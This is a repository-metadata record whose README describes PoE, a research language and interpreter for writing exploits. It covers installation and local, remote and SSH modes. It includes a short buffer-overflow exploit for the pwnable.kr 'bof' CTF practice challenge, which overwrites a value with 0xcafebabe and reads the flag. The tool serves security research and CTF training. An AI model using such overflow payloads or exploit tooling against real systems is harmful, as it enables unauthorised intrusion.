{"id":18925179,"url":"https://github.com/b2r2-org/poe","last_synced_at":"2025-10-06T00:32:15.287Z","repository":{"id":244726396,"uuid":"785047701","full_name":"B2R2-org/PoE","owner":"B2R2-org","description":"PoE (Proof-of-Exploit) is a language designed specifically for writing an exploit.","archived":false,"fork":false,"pushed_at":"2024-12-23T09:11:32.000Z","size":77,"stargazers_count":4,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2024-12-23T10:20:20.325Z","etag":null,"topics":["ctf","exploit","fsharp","hacking","poe","programming-language"],"latest_commit_sha":null,"homepage":"","language":"F#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/B2R2-org.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.md","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-04-11T04:51:07.000Z","updated_at":"2024-12-23T09:10:16.000Z","dependencies_parsed_at":null,"dependency_job_id":"d9beda8b-db64-4217-86df-fea4d53c8f7b","html_url":"https://github.com/B2R2-org/PoE","commit_stats":null,"previous_names":["b2r2-org/poe"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/B2R2-org%2FPoE","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/B2R2-org%2FPoE/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/B2R2-org%2FPoE/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/B2R2-org%2FPoE/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/B2R2-org","download_ur
l":"https://codeload.github.com/B2R2-org/PoE/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":232015496,"owners_count":18460651,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["ctf","exploit","fsharp","hacking","poe","programming-language"],"created_at":"2024-11-08T11:09:51.287Z","updated_at":"2025-10-06T00:32:15.281Z","avatar_url":"https://github.com/B2R2-org.png","language":"F#","funding_links":[],"categories":[],"sub_categories":[],"readme":"PoE\n===\n\nPoE (Proof-of-Exploit) is a language designed specifically for writing an\nexploit. It provides intuitive and concise syntax, which makes exploit\ndevelopment easy and fun. For more details, please refer to our paper:\n+ [Jung Hyun Kim, Steve Gustaman, and Sang Kil Cha. (2024), PoE: A Domain-Specific Language for Exploitation. In Proceedings of the Silicon Valley Cybersecurity Conference.](https://softsec.kaist.ac.kr/~sangkilc/papers/kim-svcc24.pdf)\n\nCurrently, PoE runs on an interpreter that we call `PoE.Replayer`, which is a\n[.NET CLI\ntool](https://docs.microsoft.com/en-us/dotnet/core/tools/global-tools). See the\n[tutorial](tutorial) to learn more about PoE and `PoE.Replayer`.\n\n## Features\n\n+ Static typing\n+ Simple and intuitive grammar for writing readable exploits\n+ Language-level integration of SMT solving and inline assembly capability\n+ Bit-vector manipulation\n+ Various built-in functions\n+ Automated `stdbuf` patching\n\n## Installation\n\nPoE supports major OSs including Windows, MacOS, and Linux distributions. 
You\ncan install the released version of PoE via .NET.\n\n### Prerequisite\n\n+ [.NET 9+](https://dotnet.microsoft.com/en-us/download)\n\n### Instruction\n\nFirst, make sure you have installed .NET 9+ on your machine so that you can run\nthe command `dotnet` from your terminal.\n\nNext, run the following command to install `PoE.Replayer`:\n```\ndotnet tool install --global PoE.Replayer\n```\n\nAfter the installation, you should be able to run the command `poe` on your\nmachine. If so, you are all set.\n\n### From source code\n\nInstead of running the released version of PoE, you can also clone the latest\nsource code of PoE and run it directly:\n```\ngit clone https://github.com/B2R2-org/PoE\ncd PoE\ndotnet run --project src/PoE.Replayer\n```\n\n## How to use\n\nPoE supports two modes for interacting with the target system:\n+ Local mode: It runs a local binary and communicates with it.\n+ Remote mode: It communicates with a remote service running on a given\nIP address and port number.\n\nYou can use either **Local mode** or **Remote mode** via the following commands:\n\n+ Local mode: `poe stdin [replay options] \u003cPoE\u003e \u003cbin path\u003e [args]`\n+ Remote mode: `poe net [replay options] \u003cPoE\u003e \u003cip\u003e \u003cport\u003e`\n\nPoE also provides another way to connect to the remote service, **SSH mode**,\nwhere you specify the username and password used to log in to the remote host via\nSSH:\n\n+ SSH mode: `poe ssh [replay options] \u003cPoE\u003e \u003cip\u003e \u003cport\u003e \u003cuser\u003e \u003cpassword\u003e`\n\nRunning the PoE replayer without any parameters shows the other usages of\nPoE.\n\n### Example usage\n\nConsider an example CTF problem named `bof` from\n[pwnable.kr](pwnable.kr). This problem has a buffer overflow vulnerability, and\nyou can easily write its exploit via PoE:\n\n```\nact exploit():\n    bv payload = \"A\"x(0x2c + 0x8) . 0xcafebabe:u32 . 
\"\\n\"\n    write(\"nc 0 9000\\n\")\n    write(payload)\n    write(\"cat flag\\n\")\n    return read(-1)\n\nsubmit:\n    return exploit()\n```\n\nAnd then, you can run the following command to run the exploit on the remote\nservice:\n```\npoe ssh bof.poe pwnable.kr 9000 bof guest\n```\nNote that you can also use Remote mode (`net`) when you connect to the remote\nservice using the other ways (e.g. via `nc`).\n\nFor more details, please see the [tutorial](tutorial).","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fb2r2-org%2Fpoe","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fb2r2-org%2Fpoe","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fb2r2-org%2Fpoe/lists"}